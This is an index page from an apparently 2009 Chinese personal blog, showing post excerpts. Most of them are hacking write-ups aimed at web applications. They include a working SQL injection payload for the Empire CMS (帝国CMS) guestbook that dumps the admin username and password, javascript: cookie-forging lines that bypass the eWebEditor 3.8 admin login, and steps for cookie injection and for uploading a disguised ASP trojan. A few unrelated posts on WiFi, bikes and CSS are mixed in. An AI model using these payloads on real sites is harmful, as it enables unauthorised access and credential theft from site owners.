香辣肉丝盖浇~~~~~~~

文章列表

2009年06月20日星期六 18:44

　　随着信息技术的发展，越来越多的人开始使用便捷的无线路由器(AP)组建家庭局域网。当你发现周围有多个AP可以连接的时候，是不是会想：如果能同时连接上多个AP，让多个AP为下载服务提升下载速度该多好啊！其实借助软件是可以实现的，下面就向大家介绍具体方法。

　　我们要借助的软件名叫VirtualWiFi，这款软件能虚拟出多块无线网卡从而达到同时连接多个AP的目的。
下载地址：

阅读全文>>

类别：ヤo技术杂烩ミ | 评论(0) | 浏览()

php版ewebeditor 3.8的漏洞

2009年06月15日星期一 09:45

php版本后台是调用../ewebeditor/admin/config.php,大家去看下源码就知道，在这里我说说利用方法:

1 首先当然要找到登陆后台,默认是../eWebEditor/admin/login.php,进入后台后随便输入一个用户和密码,当然会提示出错了,必须是出错的时候，然后这时候你清空浏览器的url,然后输入 javascript:alert(document.cookie=”adminuser=”+escape(”admin”)); javascript:alert(document.cookie=”adminpass=”+escape(”admin”)); javascript:alert(document.cookie=”admindj=

阅读全文>>

类别：ヤo我心不黑ミ | 评论(0) | 浏览()

帝国CMS 0day

2009年06月12日星期五 18:34

来源普瑞斯特

深灰丢出来的0day.
找到使用帝国CMS的站,网址后面直接加:e/tool/gbook/?bid=1
出来的是帝国CMS的留言本,在姓名处写:縗\
联系邮箱处写:,1,1,1,(select concat(username,0x5f,password,0x5f,rnd) from
phome_enewsuser where userid=1),1,1,1,0,0,0)/*
提交后爆出账号密码

类别：ヤo我心不黑ミ | 评论(0) | 浏览()

美利达公爵 09款

2009年05月23日星期六 14:40

阅读全文>>

类别：ヤo天下杂侃ミ | 评论(3) | 浏览()

Mysql5注射技巧总结(图)

2009年05月10日星期日 10:40

Mysql5和之前的版本有很多不同的地方，灵活的运用其特性可以在入侵的时候省掉很多麻烦。我试图在本文把在《渗透周杰伦官方网站》中没有写清楚的部分表达出来，你看明白这个文章后也许你会发现，原来mysql5也可以像mssql一样注射。

一、原理分析

我们先看看mysql5比之前增加的系统数据库information_schema的结构，它是用来存储数据库系统信息的

mysql> use information_schema;

Database changed

mysql> sh

阅读全文>>

类别：ヤo我心不黑ミ | 评论(0) | 浏览()

破解MSSQL的HASH密码

2009年04月26日星期日 08:52

破解MSSQL的HASH密码
原文名称 :Microsoft SQL Server Passwords (Cracking the password hashes)
原文地址 :http://www.ngssoftware.com/papers/cracking-sql-passwords.pdf
作者 :David Litchfield <david@ngssoftware.com>

Term : FreeXploiT

Author : ALLyeSNO

Date : 2005-3-25
翻译:ALLyeSNO <shellget@hotmail.com> http://blog.csdn.net/freexploit
参考文章：flashsky《浅谈SQL SERVER数据库口令的脆弱性》

SQL服务器是怎样储存密码的？

SQL服

阅读全文>>

类别：ヤo我心不黑ミ | 评论(0) | 浏览()

PJblog V3.0 0day+EXP

2009年04月23日星期四 14:27

影响版本：3.0
信息来源：零客网安

阅读全文>>

类别：ヤo我心不黑ミ | 评论(0) | 浏览()

讯时网站管理系统漏洞

2009年04月19日星期日 13:01

这套系统有N年版,一般的政府、学校和企事业单位用得多,

特证: 显示新闻News_View.asp?NewsID= 登陆login.asp?id=3,最主要的特证是用的一个有一个EDIT目录，下面的数据库是用的db/#ewebeditor.asp
以上特证只要中二个就基本可以肯定是这套系统

漏洞：这套系统原来有N多漏洞，但经过改进，现在主要的问题是COOKIES注入和列目录问题

具体的代码我就讲了，直接讲利用

第一板斧：

老版中存在一个后台COOKIES注入
直接打开登陆后台，然后在地址栏输入

javascript:alert(docume

阅读全文>>

类别：ヤo我心不黑ミ | 评论(0) | 浏览()

英文关键字研究工具集锦

2009年04月10日星期五 19:45

Google Adwords关键字工具: Google Adwords Keyword Tool
SEObook关键字列表发生器: SEObook Keyword List Generator
微软的Ad Center实验室研究关键字工具:

阅读全文>>

类别：ヤo技术杂烩ミ | 评论(0) | 浏览()

Discuz!论坛wap功能模块编码的注射漏洞

2009年03月31日星期二 11:09

信息来源：邪恶八进制信息安全团队（www.eviloctal.com）
影响版本:
Discuz!4.0.0
Discuz!4.1.0
Discuz!5.0.0
Discuz!5.5.0
Discuz!6.0.0
Discuz!6.1.0
描述:
Discuz!论坛系统是一个采用 PHP 和 MySQL 等其他多种数据库构建的高效论坛解决方案。Discuz! 在代码质
量，运行效率，负载能力，安全等级，功能可操控性和权限严密性等方面都在广大用户中有良好的口碑
由于 PHP 对多字节

阅读全文>>

类别：ヤo我心不黑ミ | 评论(0) | 浏览()

CSS隐藏文字的方法

2009年03月28日星期六 11:48

我在一篇文章所说，首页的“站点名称”最好用h1标签来定义，但从美观考虑，要用logo图片来代替h1，这时需要隐藏h1内的这段文字，但又不能对搜索引擎不友好，否则就失去了定义h1标签的意义。

在CSS中如何以图代字，找了一下CSS隐藏文字的方法，有以下几条：

1、display: none;
这个大家普遍说法是，搜索引擎可能认为被隐藏的文字属于垃圾信息而被忽略，不为隐藏的对象保留物理占位空间。GG也搜CSS文件？不过如果用这个

阅读全文>>

类别：ヤo技术杂烩ミ | 评论(0) | 浏览()

union select控制ewebeditor上传文件后缀

2009年02月18日星期三 16:11

来源：忧伤的小K
作者：X.Z.cool

目前网上流传太多ewebeidtor的修改版 lite版
216版的ewebeditor 存在一个注入漏洞之后一个版也存在这样的问题
前段时间拉至尊宝渗透一内网时发现这个东西
无后台无法登陆默认数据库但用处也不大
所以就深刻研究了下这个注入发现可以通过union 来控制允许上传类型的列表
随后时间成功利用此漏洞拿了不少东西分享下

漏洞文件是upload.asp

阅读全文>>

类别：ヤo我心不黑ミ | 评论(0) | 浏览()

ewebeditor v6.0.0版本漏洞

2009年02月18日星期三 15:56

来源：zake’s blog

今天和静流聊天，他说ewebeditor出了最新漏洞。于是就是检测一下，这个程序爆漏洞一般都是直接上传的漏洞，不过没错就是上传漏洞。首先在本地搭建一个ASP环境重命名一个木马名字例如：1.gif.asp这样的就OK了。

那么接下来完美本地搭建一个环境你可以用WEB小工具搭建一个，目的就是让远程上传。

【这里如果上传asp文件的话，使用IIS的话，应该取消asp的解析，使其成为一个可以下载的asp文件，如果解析了，可能就只是解析后的html文件了，Neeao注】

http://1

阅读全文>>

类别：ヤo我心不黑ミ | 评论(0) | 浏览()